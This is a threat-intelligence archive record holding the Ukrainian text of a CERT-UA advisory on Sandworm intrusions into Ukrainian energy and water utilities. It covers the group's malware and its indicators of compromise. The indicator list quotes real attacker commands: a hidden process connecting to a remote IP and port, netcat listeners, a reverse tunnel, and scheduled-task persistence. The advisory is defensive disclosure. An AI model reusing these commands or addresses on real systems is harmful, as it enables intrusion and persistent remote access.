{
	"id": "3b3f9b55-2679-44ba-9077-03e3bfce8cac",
	"created_at": "2026-04-06T00:10:53.148312Z",
	"updated_at": "2026-04-10T03:37:09.128752Z",
	"deleted_at": null,
	"sha1_hash": "3e6bf32da5a7ded135a13184a20074e6c4a69e51",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 465264,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 14:37:45 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA в березні 2024 року\r\nрозкрито зловмисний задум угрупування Sandworm, спрямований на порушення сталого функціонування\r\nінформаційно-комунікаційних систем (ІКС) близько двадцяти підприємств галузі енергетики, водо та\r\nтеплопостачання (ОКІ) у десяти регіонах України.\r\nПід час вжиття невідкладних заходів з реагування на інциденти, окрім відомого з 2022 року бекдору\r\nQUEUESEED (KNUCKLETOUCH, ICYWELL, WRONGSENS, KAPEKA), виявлено новий інструментарій\r\nзловмисників, а саме, шкідливі програми LOADGRIP та BIASBOAT (Linux-варіант QUEUESEED), які було\r\nвстановлено на ЕОМ (ОС Linux), що призначені для автоматизації процесів управління технологічними\r\nпроцесами (АСУТП) з використанням спеціалізованого програмного забезпечення (СПЗ) вітчизняного\r\nвиробництва. Слід звернути увагу, що BIASBOAT було представлено у вигляді шифрованого під\r\nконкретний сервер файлу, для чого зловмисники використовували заздалегідь отримане значення \"machine-id\".\r\nФахівцями CERT-UA підтверджено факти компрометації, щонайменше, трьох \"ланцюгів постачання\", у\r\nзв'язку з чим обставини первинного несанкціонованого доступу або корелюють зі встановленням СПЗ, що\r\nмістило програмні закладки та вразливості, або спричинені штатною технічною можливістю\r\nспівробітників постачальника отримувати доступ до ІКС організацій для супроводження та технічної\r\nпідтримки.\r\nЗважаючи на функціонування ЕОМ з СПЗ в межах ІКС ОКІ, зловмисники використовували їх для\r\nгоризонтального переміщення та розвитку кібератаки у відношенні корпоративних мереж підприємств.\r\nДля прикладу, на таких ЕОМ в каталогах з СПЗ було виявлено заздалегідь створений PHP-вебшелл\r\nWEEVELY, PHP-тунель REGEORG.NEO або PIVOTNACCI.\r\nУ період з 07.03.2024 по 15.03.2024 фахівцями CERT-UA вжито заходів з інформування всіх\r\nідентифікованих підприємств та дослідження і протидії кіберзагрозам у відповідних ІКС, в рамках чого\r\nвстановлено обставини первинної компрометації, вилучено та проаналізовано шкідливе програмне\r\nзабезпечення, побудовано хронологію подій інциденту, надано сприяння в налаштуванні серверного та\r\nактивного мережевого обладнання, а також встановлено технологію захисту (на деяких підприємствах\r\nLOADGRIP/BIASBOAT було створено у 2023 році).\r\nСлід підкреслити, що на ЕОМ під управлінням ОС Windows зловмисниками використовувалося шкідливе\r\nпрограмне забезпечення QUEUESEED та GOSSIPFLOW, яке відстежується з 2022 року в контексті\r\nдеструктивних кібератак угрупування UAC-0133 на об'єкти водопостачання, зокрема, з використанням\r\nSDELETE. Таким чином, з високим рівнем впевненості UAC-0133 є субкластером UAC-0002\r\n(Sandworm/APT44).\r\nhttps://cert.gov.ua/article/6278706\r\nPage 1 of 9\n\nЗауважимо, що реалізації кібератак сприяли такі фактори:\r\nне коректна сегментація (відсутність ізоляції) серверів з СПЗ постачальників, що використовуються\r\nяк елемент АСУТП, в контексті як обмеження доступу з/до мережі Інтернет, так й ІКС самих\r\nорганізацій, в межах яких вони функціонують\r\nхалатне ставлення постачальників до безпеки програмного забезпечення, що надається споживачам;\r\nзокрема, під час поверхневого аналізу вихідного коду буде виявлено банальні вразливості, що\r\nдозволяють здійснювати віддалене виконання коду (RCE).\r\nCERT-UA припускає, що несанкціонований доступ до ІКС значної кількості об'єктів тепло, водо та енерго\r\nпостачання мав бути використаний для підсилення ефекту від ракетних ударів по інфраструктурним\r\nоб'єктам України навесні 2024 року.\r\nQUEUESEED - шкідлива програма, розроблена з використанням мови програмування C++. Отримує\r\nбазову інформацію про ЕОМ (ОС, мова, ім'я користувача), виконує отримані з серверу управління команди\r\nта надсилає результат. Функції: читання/запис файлів, виконання команд (як окремий процес, або через\r\n%COMSPEC% /c), оновлення конфігурації, самовидалення. Для взаємодії з сервером управління\r\nвикористовується HTTPS. Дані передаються в JSON-форматі та шифруються за допомогою RSA+AES.\r\nКонфігураційний файл бекдору, який, зокрема, містить URL-адресу серверу управління, шифрується за\r\nдопомогою AES (ключ статично задано в програмі). Імплементовано чергу неопрацьованих вхідних\r\nкоманд/результатів - зберігається в реєстрі Windows в AES-шифрованому вигляді (як ключ\r\nвикористовується значення %MACHINEGUID%). Персистентність бекдору забезпечується дропером, який\r\nстворює відповідне заплановане завдання або запис в гілці \"Run\" реєстру Windows.\r\nBIASBOAT - шкідлива програма (ELF), розроблена з використанням мови програмування C, є Linux-варіантом QUEUESEED. Запуск на ЕОМ здійснюється за допомогою інжектору LOADGRIP.\r\nLOADGRIP - шкідлива програма (ELF), розроблена з використанням мови програмування C. Основний\r\nфункціонал - запуск пейлоаду шляхом інжектування з використанням API ptrace. Пейлоад, зазвичай,\r\nпредставлено в шифрованому вигляді (AES128-CBC), а ключ для його розшифрування формується на\r\nосновні статично зазаначеної в коді константи та значення \"machine-id\" ЕОМ.\r\nGOSSIPFLOW - шкідлива програма, розроблена з використанням мови програмування Go. Забезпечує\r\nпобудову тунелю (використовує бібліотеку-мультиплексор Yamux) та виконує функціонал SOCKS5 проксі.\r\nОкрім згаданих програмних засобів реалізації кіберзагроз угрупуванням також застосовувалися, але не\r\nвиключно:\r\nCHISEL\r\nLIBPROCESSHIDER\r\nJUICYPOTATONG\r\nROTTENPOTATONG\r\nІндикатори кіберзагроз\r\nФайли:\r\nhttps://cert.gov.ua/article/6278706\r\nPage 2 of 9\n\n4d45d7b60c10c66977f1a593aa36cea7\r\ne165c210a6d7366e2c78e5371d02e3345c25fb75393b7d7e9dc9a8fa737e74d4\r\nd58153d94e6b9b331ad2b0f0ce51743a744364ea94245c26aabfdedc4a6fae2e2d188fbe3c851f439b27ed8a9084a9d1\r\n9ddb6f9dca2d946de295d40af0f35948  350ee0a029eae1d4e4c3d9131a1b32071db9a735326022a565685a9f1521ab73\r\n6b0b5c00362339fc5a912eae413b7f1f  c13270594f873bb188f893f307d1ec94aa21ee4c3b90301e168eec3a21a055ca\r\n1938a3545517650824657fd09ce4ee16  602dbcf4008c585582d5e5d5c8ddb1932fdee07a14308e9cbf937904f31df1f7\r\ncf85ceea940ae5f2cc0ee0a9fc23d5c8  ce85f5bcd52c79582a66bc7ef3f11f4ac74e9cc9962551b5912ac6bfa78ea841\r\na048daae363e6cbe9a191d7189733ea4  6ea79c94ed790093341b1a479eb31bdf7368e3c891501aa2ce18acc71b318c96\r\n691c1fb1a80f1d4c502753d656e72c32  ccb9edfa233328c3351bd3a46fec037aeb27b3a74779c2bbb738e9e108c33e76\r\n50b5582904fe34451f5cb2362e11cb24  bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f\r\n5294aaf2ff80547172ebb9e0bcb52e0f  f30b9f6e913798ca52154c88725ee262a7bf92fe7caac1ae2e5147e457b9b08a\r\n58504fc65456f2d932173446e15b1799  8685a79ff9e0b1b4a6372c6cd1cafcc9c72e12b83f782466f17c350f2d12184a\r\n12b4ee7b8a55046520dd1e1dd388bf47  4571860df3a7c8f67db93bd038c1847ddda5ef4b0b23e631d814778ab7a5d549\r\nfb9e2fc411c17160b97ab5abfcef7c55  8369d112dc42151ceb3aaa6eca96fb66a08e631a2f18860d716a0604a80da76c\r\n963ea514ef1b047e99cc90503f16b2c5  4e6582b8ff2fb2e91cc31de2f4ed4f72ef7ac52845d4dbfabf36081d849bba64\r\nb80d7cb828535ec1ef6e27e5d5f2d2cd  5fdb577b5ce71c42032c77cf41b3a4478726dff5a234abd0a26ff0bdd42e4ef9\r\n97608532187c8df1abb17156e4d99ee2  4a4dde90762accb8d61caad9923f1473c6d8ee493c7dc6c482dfd52c9f8fc2f5\r\n9769f67f2189ac32307600a2387e28f7  3f5044eb9f2ae3f46d6b64d56e3a37248ea21a340d4cbb42ba8a809f7c75824b\r\n09fe0ab36d7c16108456c60eb56a09c7  d3f97c3df60da89fc68c722140b6a6c9cc8bfc27ac3e442b5fdcfdfcdbd34e87\r\ncdacfee7c1122983c9394de44493c542  459c676115ad0e363697fda048e7f38c5fa5bb002e3dcdab98d7c93cb61948b3\r\n48656739fe14c0d70f11f65f67f86de5  dc31de076eb9b2407bc4e7fa44216f906f0857271d71a2ea2fb6f35c96cd8f35\r\n6993aa0b81fb20d706c00ecf764ce3f2  5557aea34234deb015d8e6c39ea2945bad6dd4e9dfe5278265c1183aa3942394\r\n0d2363b184e35c0f005db9b40e2cd76c  2239aa7e5765b810009c73a43d6df5526c4c42c31e45d7ae181642dabe2c4d94\r\na39a4125e48ce614b44fea879454a0f8  4e568242667c61a1551d3e5f3e42107c43db5d989647b333325d10840cd2d58e\r\ned7620864bd720c8cf79e63ec4e679d6  155cd259e21c1dc3b6978f528e9d13a55483336c5d3c12d5b801dca720f443b7\r\nbe43644bdf06e8b740ce31c82f4f8bb2  ff6c150364312afd54d37f891da02542756a8036698a0911ab8e32d4e0dea030\r\n82f7464ec5921ab94656bd4bff58708f  feae0ab35affa24c52650c9da789cf214d4f7c37bdef3e4d0412feb4aaa3b4db\r\n715fcd523ffceafb970679099b21c55e  270b478209df6ecdd54b4cd7fcba79d30647f83c98f0668795ece81b39d7c629\r\n5ff34c5296a5b170ba86f5a9c1222fca  bdd7b08ab069c71877352e4cf7cf0e1e14b14ccffd3fb827a81ed6fc564ff99b\r\n4e23243e3e2ce4d234034fe163d4d095  77c7db28deb338378367fd9d50e09cc2ef8d7143a11fd0f03eb1bab96e6411fa\r\nf05aec3e7ea30b93ea11e3cc8b998ca5  9975cfa490c372012364c110a7f249d5c812b0afd84a38ed71821dc56c15b29f\r\n5fad6d88dc503f59adfa767e11985ff1  01208ced0bd6bf8b72bbf09ec47ddb52014f56d31bf764184bb35134be873c62\r\n3bee971f994f21779c3bc7e07f7029be  645821ba80859651cdb8c1c1f8129702a85503c62b0c3ce74f99d50214f67244\r\n0b0f1f38f85827b4753c0cfc95ee9dc9  ea415d89592b55402c1ac66fa934bd31ec17456407ac4adb2e72f9bc6f5061af\r\n2574bd88088e3437a183016e59302928  06584cc9f5bc80964b80220064dda52e822e81ad1d0053f4390ca1433c64971b\r\n31d5165a9d83c3ea370c2cd262fbba6f  d5620b21a02934aafb2caeaec0f0472adac185f60fc06ee5e97c60cc5cec25ac\r\n087e6a5bf9bafac4b5c7fcc0ab0201f1  9a76e608afca114f18e2b794e9a557b910f43e575c816019a49876188602c3aa\r\nea2161085f0c5a7a67ab245513ff5162  63939d3bd170846a95b124c09a4b6399ab1e790d0c2f407141de9265efc51ee9\r\n3d7c4521233b9d9dd6a150c26b5fcc68  1800fcac02899d6d4d9f5f0b15a57a140abb29d6f4877f133d57b3e60eaf66c3\r\n8ab0e9251fe39a6d9ef36d0548476654  1180d7a61dbf718f092b3f9dc63c32e1d0228b190c8c254563b6332cab9d7c0e\r\n938f05807048a4e9b95bd4eee8c7c1a4  c3859810b9842daf129bc887e7b267ae70ba985387b1cea0fc62270c74c3d4a6\r\n064c252bc5ee2395fb82aa7c0e599d3a  343e50eed373fa970545785eeace049ead8bd24a1062d6fcf589a629323532ca\r\nfbe469cbe4c1a746619b0fad3c3647e7  d8cd22fc4ef77c1b19d189dcb1ced5db6ead68867c51a23deed3cb422ca4412a\r\nbdb21d4397f8e76923d6635504a5ada4  a29944006225bb5cb0dacf597ef614cf947a8ac088cec90c954506b38ebdc28e\r\n227b6198541178db566714c503dab36e  8a7b3a7a9a4e8b7fd45c94b56ac59f6e15b6560f692756cf6050342bea06a1b3\r\ndee2d8477084747edf37026dade1a827  fa6439c50f2187da3c4c594f0e53037637184167f3e55a7aa2766e8a3b7d55f0\r\n7055dce07c716aa2429001dae97633fb  d436d509d00d89bf118f2f06bde24bdaaa03e083a514e11fbe000f4c2a81f136\r\nhttps://cert.gov.ua/article/6278706\r\nPage 3 of 9\n\n3e9022ce46fdccab4e40d1e01a8addb4\r\nf3280e61f7c810457b8c6741aa57bdceb1dd918d18f16d314761a49788665877\r\n63ee45adf7d1fe4acd5b1632bbadd8730d898a405e641797c42a1c39a22740462e3a5ebaa092199005f2b2e505bf5e42\r\nb53e37e7a414872ec3d33d36c0bc1e81  09fb7feb2b209f79d5ffb855b63037ca8cd8449dd168199a23f15ca9f6a454ea\r\n3eeebd90a6ea0d60b10eeac1da2d735c  335d36ba132c292c255c520f09a7eba9ff585d52486f259eff43989658727f4f\r\nd597d341ade717dd73a443172458fc86  52faa381392c1a86b537096c2730de5aeab9be7512bde9536aef84857b19753e\r\nd59c63ddb629773aded9c85e472d67e3  a97252c1a675d3c64dc806181e64f0a0e86914a540476b08cc578d94759ee082\r\nc998ac471420f48ec121050068972d47  1dbb018010a79d869f9a3f61907f81e61e15a366efe7302e26d93946754cd311\r\nb1c30d0f77386b42cefa8f10d0a98576  7cddf5eabb6e59b9901e6a68996413e3469f8c56b4da92cf24c18862221c3046\r\n38f3f5ccb8906940282d0046583d318e  c4285344547b314c431ab6226612b2b14f62beb45c6feb91c8fcfa17d7031d98\r\ncd439b12d10428db1d3365ea01361f48  e76f78c5afbd1d1a3fefa7a37d1737f9cb06197f4a6d6dd8f7b74f3978362a9f\r\n9ca2c77a5c2f8401dfb67dab34b648cf  e6e1e231195f666e8807432f3992e7b1830a3a170229d679933042d3cc1246aa\r\n0f359771ef52bf54b2196ce6f8a2642c  29c21a87bed19457f7f76e5f39c818ad563a2ddb203961bb2295263d8e875044\r\n2cfc8ce15a56667074c4b0ca4a11d7f3  6ca881729c4610cb08f0f54fa1ff2ad9a0f56313da8ae5caa3746f8c1cd527b2\r\n108dddf7f1bc10fafbdc6f11c26b4c5a  3c5e7c6da03c5f66d71332a34b3a1f57fed05d3de624f05dae50f7b14a4e44b3\r\n7f1712c4102e4cfadd1c44d9b29f139d  807bfade291ab71c1bb47ef2c18a52d6db7b7546f28a421edf18ebeae5ad00aa\r\ne64ec2535335ddd40e2fb53b53e5b5f9  e2551b76534f0646fccbffd01856948b8f440618afd2b17cda6a9ae59e8e28f7\r\n7cf92e30acd55232a050fe1cf6eaf2be  27fe2d836d02a72e61b437b170f2ea6285579a6d443334d3cc2e27e77aa26b7f\r\n4a7250531376bf48d06547d46a853d60  21897e25ace1e8b4da317cb3ba866a1e22b5211516454596f577cacb435f1455\r\n233ceffbb3119df13ceb72f01077c998  622e355f8fe1756447a0cb47d4873a0f8ecb7d46d4705c425a4dc015050ad85b\r\nf8cf05346cba3ccd0cdb28c44e8036a1  d8d3a1c24a12795f0c65509db8b40c26396a51d0dfa258b6fc317e8b2270c5a3\r\ned8b9d38fe272f2692b47292e74a0352  cca9accd3c1554703ab11eb9c10b146d9d8a84ea165450003200de1ebbc2ac4c\r\n2c1397f61325d3ab7eee97124ed8dcfa  c237f1a3f75b2759f66ec741448bb352e95e186a9a689f87c8641b44a13d878b\r\n88d7b461ac0c52f95a81090cf0903ebc  61b0246202707414da97911c0447eed70499e02285db9190a5842de748ae0bd1\r\nХостові:\r\n/etc/init.d/crm.sh\r\n/etc/init.d/[a-z]{3}.sh\r\n/etc/rc.d/init.d/opf.sh\r\n/etc/ld.so.preload\r\n/run/systemd/generator.late/opf.service\r\n/etc/init.d/.depend.startup\r\n/etc/rc.d/init.d/.depend.start\r\n/usr/local/etc/rc.d/.depend.start\r\n/tmp/.env\r\n/usr/local/lib/env.so\r\n/usr/sbin/oscada\r\n/var/lib/AccountsService/mex\r\n/var/lib/Pegasus/bir\r\n/var/lib/alternatives/xrr\r\n/var/lib/apache2/ajh\r\n/var/lib/apt/sdo\r\n/var/lib/aspell/akc\r\n/var/lib/certmonger/rgp\r\n/var/lib/dictionaries-common/kkd\r\n/var/lib/dictionaries-common/nzf\r\nhttps://cert.gov.ua/article/6278706\r\nPage 4 of 9\n\n/var/lib/initramfs-tools/ijs\r\n/var/lib/dnf/rgp\r\n/var/lib/dpkg/eso\r\n/var/lib/lcw\r\n/var/lib/lws\r\n/var/lib/net-snmp/rgp\r\n/var/lib/nfs/bir\r\n/var/lib/pam/qqa\r\n/var/lib/php/rgp\r\n/var/lib/samba/rgp\r\n/var/lib/sss/xrr\r\n/var/lib/systemd/bir\r\n/var/lib/systemd/jpt\r\n/var/lib/systemd/uoj\r\n/var/lib/ubuntu-advantage/pml\r\n/var/lib/ucf/ero\r\n/var/lib/ucf/lox\r\n/var/lib/ucf/riq\r\n/var/lib/xml-core/jjh\r\n/var/lib/aspell/akc -e /var/lib/dpkg/eso -h\r\n/var/lib/dictionaries-common/kkd -e /var/lib/xml-core/jjh -h\r\n/var/lib/dictionaries-common/lma -e /var/lib/doc-base/oat -h\r\n/var/lib/dictionaries-common/nzf -e /var/lib/apache2/ajh -h\r\n/var/lib/lcw -e /var/lib/lws -h\r\n/var/lib/net-snmp/rgp -e /var/lib/nfs/bir -h\r\n/var/lib/pam/sxw -e /var/lib/dictionaries-common/vjr -h\r\n/var/lib/php/rgp -e /var/lib/Pegasus/bir -h\r\n/var/lib/sss/xrr -e /var/lib/systemd/jpt -h\r\n/var/lib/systemd/uoj -e /var/lib/initramfs-tools/ijs -h\r\n/var/lib/ubuntu-advantage/pml -e /var/lib/pam/qqa -h\r\n/var/lib/ucf/ero -e /var/lib/apt/lpq -h\r\n/var/lib/ucf/lox -e /var/lib/apt/sdo -h\r\n/var/lib/dls/706f64686a6a7669 (приклад шляху для конфігураційного файлу)\r\n/var/lib/[a-z]{3}/[a-f0-9]{16}\r\n/var/www/dokuwiki/inc/preload.php\r\n/var/www/dokuwiki/main.php\r\n/var/www/html/.back_devices_.php\r\n/var/www/html/Scripts/export/jspdf/jspdf.php\r\n/var/www/html/Users/Shared/Presets/_backup_dataform.php\r\n/var/www/html/getformdate.php\r\n/var/www/html/glpi/man.php\r\n/var/www/html/glpi/pics/water.php\r\n/var/www/html/meter.php\r\n/var/www/html/report.php\r\n/var/www/html/settings125.report.php\r\n/var/www/main/.users.php\r\n/var/www/main/Scripts/export/fexport.php\r\nhttps://cert.gov.ua/article/6278706\r\nPage 5 of 9\n\n/var/www/main/getformdate.php\r\n/var/www/modules/init.php\r\n/var/www/modules/jobs.php\r\n/var/www/veryimage.php\r\n/var/tmp/sam.txt\r\n/var/tmp/system.txt\r\n%PROGRAMDATA%\\Microsoft\\hasuti.wll\r\n%PROGRAMDATA%\\fp.exe\r\n%PROGRAMDATA%\\jp.exe\r\n%PROGRAMDATA%\\k.bat\r\n%PROGRAMDATA%\\msd.exe\r\n%PROGRAMDATA%\\ntuser.exe.exe\r\n%PROGRAMDATA%\\r.bat\r\n%PROGRAMDATA%\\r1.bat\r\n%PROGRAMDATA%\\r2.bat\r\n%PROGRAMDATA%\\r3.bat\r\n%PROGRAMDATA%\\rp.exe\r\n%PROGRAMDATA%\\rs.exe\r\n%PROGRAMDATA%\\winbox64.exe\r\n%PROGRAMDATA%a\\ibmsmart.exe\r\n%PROGRAMDATA%a\\msrsts.doc\r\n%PROGRAMDATA%a\\ntuser.exe\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Sens Api\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\OneDrive\r\nC:\\Windows\\system32\\rundll32.exe \"%PROGRAMDATA%\\Microsoft\\hasuti.wll\", #1\r\n%PROGRAMDATA%\\Microsoft\\lunose.wll\r\n%COMSPEC% /c %APPDATA%\\pizi.bat\r\n%COMSPEC% /c schtasks /create /sc ONSTART /tn \"Sens Api\" /f /np /tr %WINDIR%\\system32\\rundll32.exe %P\r\nD:\\xampp\\htdocs\\msd.bat\r\nD:\\xampp\\htdocs\\postgis.php\r\nD:\\xampp\\htdocs\\r.exe\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Sens Api\r\nGlobal\\BFE_Notify_Event_%PROFILEGUID%\r\nHKCU\\Software\\Microsoft\\Cryptography\\Providers\\%PROFILEGUID%\\'Seed'\r\nStart-Process -WindowStyle hidden \"%PROGRAMDATA%a\\ibmsmart.exe -c 185.153.199.43:50443\r\ncmd /c start \"\" C:\\Windows\\system32\\rundll32.exe \"%PROGRAMDATA%\\Microsoft\\hasuti.wll\", #1\r\nnc -lnvp 7632\r\nnc -lnvp 7633\r\noscada server -p 56743 --reverse \u0026\r\ntaskkill /F /IM rp.exe\r\nМережеві:\r\n185.38.150.8\r\n165.231.34.106\r\n178.250.188.114\r\nhttps://cert.gov.ua/article/6278706\r\nPage 6 of 9\n\n185.225.114.90\r\n193.189.100.203\r\n194.61.121.211\r\n195.154.182.165\r\n196.245.156.154\r\n196.245.156.34\r\n88.80.145.239\r\n91.92.137.6\r\n5.45.75.45\r\n5.45.74.11\r\n195.154.166.87\r\n185.153.199.43\r\n91.92.137.164\r\nhttps://185.38.150.8:443/star/key\r\nhttp://178.250.188.114/ubuntu/focal\r\nhttp://185.225.114.90/accept\r\nhttp://194.61.121.211/application\r\nhttp://195.154.182.165/checkhealth\r\nhttp://196.245.156.154/map/title\r\nhttp://91.92.137.164/json\r\nhttps://165.231.34.106/users/me\r\nhttps://178.250.188.114/ubuntu/focal\r\nhttps://185.225.114.90/accept\r\nhttps://194.61.121.211/application\r\nhttps://195.154.182.165/checkhealth\r\nhttps://196.245.156.154/map/title\r\nhttps://91.92.137.164/json\r\nГрафічні зображення\r\nhttps://cert.gov.ua/article/6278706\r\nPage 7 of 9\n\nРис.1 Приклад запланованого завдання для запуску QUEUESEED\r\nhttps://cert.gov.ua/article/6278706\r\nPage 8 of 9\n\nРис.2 Приклад BASH-скрипта для запуску LOADGRIP/BIASBOAT\r\nSource: https://cert.gov.ua/article/6278706\r\nhttps://cert.gov.ua/article/6278706\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/6278706"
	],
	"report_names": [
		"6278706"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434253,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e6bf32da5a7ded135a13184a20074e6c4a69e51.pdf",
		"text": "https://archive.orkl.eu/3e6bf32da5a7ded135a13184a20074e6c4a69e51.txt",
		"img": "https://archive.orkl.eu/3e6bf32da5a7ded135a13184a20074e6c4a69e51.jpg"
	}
}